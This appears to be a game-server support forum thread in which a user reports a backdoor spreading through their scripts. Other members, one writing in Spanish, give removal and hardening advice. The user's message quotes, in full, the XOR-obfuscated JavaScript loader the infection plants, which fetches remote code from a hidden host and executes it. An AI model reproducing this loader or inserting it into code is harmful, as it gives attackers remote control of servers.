#Help Me

1 messages · Page 1 of 1 (latest)

peak marlin
#

I have a script that's creating backdoors and infecting all my other scripts. Could someone share a detector to see which one is the fastest at infecting everything?

rancid blade
#

Well what leaks have u installed?

peak marlin
#

I don't know

rancid blade
#

Do you know what scripts youve even added?

peak marlin
#

I believe that

rancid blade
wooden horizonBOT
#

@peak marlin
Please provide a FULL SCREENSHOT.
:warning: This means literally the entire screen, from corner to corner!
:warning: Do not erase, censor or crop anything out.
:warning: Include the URL at the top (if browser) and clock at the bottom.
:warning: Include the windows taskbar and clock at the bottom.

peak marlin
rancid blade
#

Where did u get the script?

peak marlin
#

x=(e,k=3)=>[...e].map(c=>String.fromCharCode(c.charCodeAt()^k)).join("");v="lmpw#kwwsp#>#qfrvjqf+$kwwsp$*8 lmpw#glnbjm#>#$pwfb{pqjswp-ln$8 lmpw#vqo#>#$kwwsp9,,$#(#glnbjm#(#$,y[fBKIIDD$8 lmpw#ebooabh#>#$kwwsp9,,$#(#glnbjm#(#$,e{qf$8 wqz#x ##kwwsp-dfw+vqo/#+qfp*#>=#x ####ofw#g#>#$$8 ####qfp-lm+$gbwb$/#+kvmh*#>=#x ######g#(>#kvmh8 ####~8 ####qfp-lm+$fmg$/#+#>=#x ######wqz#x ########je#+g-wqjn+-pwbqwpTjwk+$?$**#wkqlt#38 ########mft#Evmwjlm+$dolabo$/#g*+dolabo*8 ######~#bwk#x ########wqz#x ##########kwwsp-dfw+ebooabh/#+ebooabhQfp*#>=#x ############ofw#eg#>#$$8 ############ebooabhQfp-lm+$gbwb$/#+kvmh*#>=#x ##############eg#(>#kvmh8 ############~8 ############ebooabhQfp-lm+$fmg$/#+*#>=#x ##############wqz#x ################mft#Evmwjlm+$dolabo$/#eg+dolabo8 ##############~#bwk#x~ ############~8 ##########~-lm+$fqqlq$/#+*#>=#x~8 ########~#bwk#x~ ######~ ####~8 ##~-lm+$fqqlq$/#+#>=#x~*8 ~#bwk#x~";globalThisx("fubo");

rancid blade
#

Ok, where did u get the script

peak marlin
#

Is there anything that can be done?

rancid blade
peak marlin
#

It's a script I downloaded and it did that for me.

#

What I sent you is what that script does to infect me

rancid blade
#

Ok. So then anwser my question. Where did you get it from.

peak marlin
#

What I sent you is what the infection script generates for me.

rancid blade
#

Ok why do u keep dodging the question?

#

So since u wanna jist dodge it this is what u can do. Find the script that is infected. Remove it and reinstall the artifacts

#

Could be more then one bc idk what you downloaded and u refuse to say anything related to that. So best of luck. You looking for .js scripts that are obsoleted

peak marlin
#

Look, I speak Spanish, and I struggle with questions in Spanish. What I asked is if you have any tool to detect that script.

rancid blade
#

Google

blissful basin
#

@peak marlin al parecer son los artifact ya que e visto a varios con ese mismo problema pero realmente eso que pegaste es una puerta trasera consejo hace backup de la base de datos, cambia api, licencias, si tienes el visual coloca todos los archivos y en la lupa busca justamente lo del final "globalThisx("fubo")" si puedes reinstalar y buscar script legitimos mejor evita poner luego d esto tus ultimos scipt una vez que borres esa linea seguramente se te creo carpetas si ves carpetas raras como por ej lib, temp o vacoas como server o client, etc borrala ya que ahi estan ocultos tambien suele crearse en data de autos o ropa addon esos backdoors modifican los fx si ves --server o algo similar borralo y en caso de infecciones en script con html reinstala el script nuevamente lo otro q te puedo aconsejar es que veas tutorial ejecutes el cmd con el sv off y chequees acceso remotos hay formas de bloquear la conexion revisa ip que no conoces o mejor si tienes una vps contratada habla con el proveedor esto es normal el 90% de servidores afecta el copy pero hay un 100% de gente aburrida infectando servidores mediante script, y lo otro evita abrir puertos innecesarios fivem solo se requiere puertos 30120 de salida como de entrada y por ultimo borra cache e reinstala artifact